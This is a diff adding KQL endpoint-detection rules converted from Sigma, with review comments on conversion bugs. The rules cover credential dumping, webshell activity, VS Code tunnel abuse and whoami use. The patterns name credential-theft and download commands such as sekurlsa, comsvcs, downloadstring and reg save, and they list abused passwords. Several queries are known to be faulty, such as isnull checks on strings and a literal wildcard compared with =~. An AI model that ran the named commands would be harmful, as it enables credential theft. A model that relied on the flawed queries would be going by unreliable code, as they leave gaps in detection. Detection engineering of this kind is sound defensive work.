+++ b/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql @@ -0,0 +1,10 @@ +// Title: VeeamBackup Database Credentials Dump Via Sqlcmd.EXE +// Author: frack113 +// Date: 2021-12-20 +// Level: high +// Description: Detects dump of credentials in VeeamBackup dbo +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql b/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql new file mode 100644 index 00000000..2819ae55 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql @@ -0,0 +1,10 @@ +// Title: Verclsid.exe Runs COM Object +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects when verclsid.exe is used to run COM object via GUID +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")) and (not(((ProcessCommandLine contains "verclsid.exe\" /S /C {" and ProcessCommandLine contains "} /I {") and InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\RuntimeBroker.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql new file mode 100644 index 00000000..1b3bdc3b --- /dev/null +++ b/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql 
@@ -0,0 +1,12 @@ +// Title: Virtualbox Driver Installation or Starting of VMs +// Author: Janantha Marasinghe +// Date: 2020-09-26 +// Level: low +// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.006, attack.t1564 +// False Positives: +// - This may have false positives on hosts where Virtualbox is legitimately being used for operations + +DeviceProcessEvents +| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql b/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql new file mode 100644 index 00000000..d48b4aca --- /dev/null +++ b/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql @@ -0,0 +1,12 @@ +// Title: Visual Basic Command Line Compiler Usage +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative +// Date: 2020-10-07 +// Level: high +// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 +// False Positives: +// - Utilization of this tool should not be seen in enterprise environment + +DeviceProcessEvents +| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql new file mode 100644 index 00000000..d38c1c38 --- /dev/null +++ b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql @@ -0,0 +1,12 @@ +// Title: Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja +// Date: 2023-10-25 +// Level: medium +// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel + +DeviceProcessEvents +| where (ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or ((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql new file mode 100644 index 00000000..ece67324 --- /dev/null +++ b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql 
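Review bot: `isnull(ProcessVersionInfoOriginalFileName)` in the first branch of the VS Code tunnel query can never be true, because Kusto string columns are never null (a missing value is the empty string), so the branch meant to catch a bare `<name>.exe tunnel` invocation with no version info is dead and only the `code-server.cmd` and `--accept-server-license-terms` branches can fire. The Sigma `OriginalFileName: null` test should be rendered as `isempty(ProcessVersionInfoOriginalFileName)`. This looks like a converter mapping rather than a rule problem, so the same fix presumably belongs in the conversion code for every `null` field test, not just this file.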
@@ -0,0 +1,12 @@ +// Title: Visual Studio Code Tunnel Service Installation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Legitimate installation of code-tunnel as a service + +DeviceProcessEvents +| where ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql new file mode 100644 index 00000000..8b11bba6 --- /dev/null +++ b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql 
@@ -0,0 +1,12 @@ +// Title: Visual Studio Code Tunnel Shell Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel and running code from there + +DeviceProcessEvents +| where (InitiatingProcessCommandLine contains ".vscode-server" and InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe") and ((ProcessCommandLine contains "\\terminal\\browser\\media\\shellIntegration.ps1" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bash.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql new file mode 100644 index 00000000..858789b3 --- /dev/null +++ b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql 
@@ -0,0 +1,12 @@
+// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: medium
+// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql
new file mode 100644
index 00000000..3975e524
--- /dev/null
+++ b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql
@@ -0,0 +1,10 @@
+// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2023-04-11
+// Level: medium
+// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql b/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql
new file mode 100644
index 00000000..707a88f1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql
@@ -0,0 +1,12 @@
+// Title: VMToolsd Suspicious Child Process
+// Author: bohops, Bhabesh Raj
+// Date: 2021-10-08
+// Level: high
+// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+// False Positives:
+// - Legitimate use by VM administrator
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql
new file mode 100644
index 00000000..6da102e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql
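Review bot: The empty-command-line exclusion is spelled twice, as `(ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe")`; KQL's `isempty()` is true for both null and the empty string, so one predicate `(isempty(ProcessCommandLine) and FolderPath endswith "\\cmd.exe")` expresses the same filter and reads closer to the upstream intent. The same null-or-empty split appears in the whoami.exe execution anomaly and the suspicious-parent-directory rules later in this chunk, where `InitiatingProcessFolderPath in~ ("", "-")` is paired with a separate `isnull(InitiatingProcessFolderPath)`; `isempty(InitiatingProcessFolderPath) or InitiatingProcessFolderPath == "-"` covers those. This looks like a generator-level pattern, so it is probably best fixed in the converter rather than by hand-editing the output.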
@@ -0,0 +1,12 @@
+// Title: VolumeShadowCopy Symlink Creation Via Mklink
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Shadow Copies storage symbolic link creation using operating systems utilities
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+// False Positives:
+// - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql
new file mode 100644
index 00000000..fc73bb67
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql
@@ -0,0 +1,10 @@
+// Title: Wab Execution From Non Default Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql
new file mode 100644
index 00000000..23d1fead
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Wab/Wabmig Unusual Parent Or Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: high
+// Description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wab.exe" or InitiatingProcessFolderPath endswith "\\wabmig.exe") or ((FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql b/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql
new file mode 100644
index 00000000..1fa517ab
--- /dev/null
+++ b/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql
@@ -0,0 +1,14 @@
+// Title: Weak or Abused Passwords In CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
+// An example would be a threat actor creating a new user via the net command and providing the password inline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Legitimate usage of the passwords by users via commandline (should be discouraged)
+// - Other currently unknown false positives
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..057f3ed2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql
@@ -0,0 +1,11 @@
+// Title: WebDav Client Execution Via Rundll32.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
+// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql b/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql
new file mode 100644
index 00000000..000b1ee1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql
@@ -0,0 +1,10 @@
+// Title: Webshell Detection With Command Line Keywords
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson
+// Date: 2017-01-01
+// Level: high
+// Description: Detects certain command line parameters often used during reconnaissance activity via web shells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or ((ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " -windowstyle hidden" or ProcessCommandLine contains ".WebClient).Download") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql b/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql
new file mode 100644
index 00000000..cd01bc5b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql
@@ -0,0 +1,12 @@
+// Title: Webshell Hacking Activity Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-17
+// Level: high
+// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql
new file mode 100644
index 00000000..1daff42d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql
@@ -0,0 +1,10 @@
+// Title: Webshell Tool Reconnaissance Activity
+// Author: Cian Heasley, Florian Roth (Nextron Systems)
+// Date: 2020-07-22
+// Level: high
+// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_as_parameter.kql b/KQL/rules/windows/process_creation/whoami_as_parameter.kql
new file mode 100644
index 00000000..7db1a91e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_as_parameter.kql
@@ -0,0 +1,10 @@
+// Title: WhoAmI as Parameter
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql
new file mode 100644
index 00000000..4f760137
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql
@@ -0,0 +1,14 @@
+// Title: Whoami.EXE Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: medium
+// Description: Detects the execution of whoami.exe with suspicious parent processes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+// - Monitoring activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or (InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql
new file mode 100644
index 00000000..03c0e219
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql
@@ -0,0 +1,10 @@
+// Title: Whoami.EXE Execution From Privileged Process
+// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
+// Date: 2022-01-28
+// Level: high
+// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql
new file mode 100644
index 00000000..39356810
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql
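Review bot: The account predicates `AccountName contains "AUTHORI" or AccountName contains "AUTORI"` are unlikely ever to match, because in DeviceProcessEvents the "NT AUTHORITY" part of a principal is carried in AccountDomain while AccountName holds only the user part (e.g. the domain is "nt authority" and the name is "system"), so in practice only the `TrustedInstaller` branch of this high-severity rule can fire. The upstream `User` field appears to have been mapped onto AccountName alone; the domain-based substrings should be checked against AccountDomain instead, i.e. `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI" or AccountName contains "TrustedInstaller")`. Worth verifying against a few real events, and, if confirmed, fixing in the converter's field mapping so every rule that uses `User` benefits.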
@@ -0,0 +1,10 @@
+// Title: Whoami.EXE Execution With Output Option
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..af97e23b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Windows Admin Share Mount Via Net.EXE
+// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects when an admin share is mounted using net.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+// - Administrators
+
+DeviceProcessEvents
